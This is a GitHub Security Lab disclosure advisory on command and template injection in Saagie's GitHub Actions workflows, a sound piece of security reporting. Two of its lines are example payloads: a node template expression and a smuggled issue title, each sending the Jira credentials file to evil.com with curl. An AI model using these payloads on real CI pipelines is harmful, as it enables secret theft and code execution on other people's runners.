GHSL-2020-206: Command and template injections in Saagie workflows

Coordinated Disclosure Timeline

• 10/29/2020: Report sent to vendor
• 11/04/2020: Vendor acknowledges
• 12/01/2020: Issue resolved in all affected repositories

Summary

GitHub workflows in saagie/technologies, saagie/technologies-plugin and saagie/sdk repositories are vulnerable to arbitrary code execution from user comments.

Product

saagie/technologies, saagie/technologies-plugin and saagie/sdk repositories

Tested Version

Master branch.

Details

Issue 1: Hidden expression expansion of input parameters passed to atlassian/gajira-create or atlassian/gajira-comment

Jira Add comment on issue step in comment_issue.yaml, Jira Create issue step in create_issue.yaml, Jira Create issue step in create_issue.yaml and Jira Create issue step in create_issue.yaml workflows are vulnerable to arbitrary code execution.

${{ github.event.issue.title }},${{ github.event.issue.body }} and ${{ github.event.comment.body }} are used to format input values to atlassian/gajira-create(comment) actions. For example:

on:
    issue_comment:
        types: [created]
...
uses: atlassian/gajira-comment@v2.0.0
with:
    issue: ${{ steps.extract_jira_number.outputs.jira_number }}
    comment: |
        From : ${{ github.event.comment.user.login }}
        Comment :
        {quote}${{ github.event.comment.body }}{quote}

However the Atlassian actions have a hidden feature - they expand {{}} internally. This way when the issue title or body contains an expression in double curly braces it is evaluated by node.js in these actions.

Impact

This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may comment on an issue with:

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the comment to Never mind my bad.

Issue 2: The public GitHub issue title is used to format a shell command

When a user comments on a public issue it automatically starts the comment_issue.yaml GitHub workflow. The title of the issue is used to format a bash script.

on:
    issue_comment:
        types: [created]
...
- name: Extract JIRA number
  id: extract_jira_number
  run: echo "::set-output name=jira_number::$(echo ${{ github.event.issue.title }}| sed 's/.*\[\(${{ secrets.JIRA_PROJECT }}-[[:digit:]]\{1,\}\)\].*/\1/')"

Impact

This vulnerability allows for arbitrary command injection into the bash script. For example a user may create an issue with a title a)"; curl -d @$HOME/.jira.d/credentials http://evil.com # which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible the attacker may modify the issue title and close it.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-206 in any communication regarding this issue.